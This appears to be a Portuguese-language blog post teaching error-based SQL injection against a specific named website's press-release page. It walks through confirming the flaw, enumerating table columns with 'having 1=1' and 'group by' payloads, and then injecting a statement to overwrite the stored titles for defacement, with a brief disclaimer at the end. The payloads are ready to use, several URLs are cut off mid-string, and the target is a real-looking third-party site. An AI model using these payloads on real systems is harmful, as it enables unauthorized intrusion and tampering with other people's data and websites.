Sim, pelo nome parece difícil mas é bem fácil Primeiros, devemos achar uma URL vulnerável.
Fácil, digite: acidmud no google ahoahoaVou pegar a URL http://www.ihdg.com/press/release.asp?pid=56.
Agora, vá no seu browser e digite:
http://www.ihdg.com/press/release.asp?pid=56
Deverá aparecer:
Microsoft OLE DB Provider for SQL Server error '80040e14'
Unclosed quotation mark before the character string ''.
/press/release.asp, line 22
Isso quer dizer que tá vulnerável 8D
Agora vamos identificar umas dbs.
http://www.ihdg.com/press/release.asp?pid=56having 1=1
Apareceu isto:
Microsoft OLE DB Provider for SQL Server error '80040e14'
Column 'tblPressRelease.ReleaseDate' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.
/press/release.asp, line 22
Já achamos uma, tblPressRelease.ReleaseDate =D
Agora faça:
http://www.ihdg.com/press/release.asp?pid=56group by tblPressRelease.ReleaseDate
E verás outra db
Microsoft OLE DB Provider for SQL Server error '80040e14'
Column 'tblPressRelease.Title' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
/press/release.asp, line 22
Eita mãe, se você quiser ir achando outras columns, é so colocar uma , e depois a dbpor exemplo
http://www.ihdg.com/press/release.asp?pid=...ase.ReleaseDate, tblPressRelease.Title
e vai indo =D
Agora vamos mudar o conteúdo do tblPressRelease.Title.
faça o seguinte:
http://www.ihdg.com/press/release.asp?pid=....Title='seu conteudo aqui'
Faça isto e seja feliz xD
Lembre-se, deface é um crime virtual. Não me responsabilizo por seus atos!
Assinar:
Postar comentários (Atom)
Postagens
Nenhum comentário:
Postar um comentário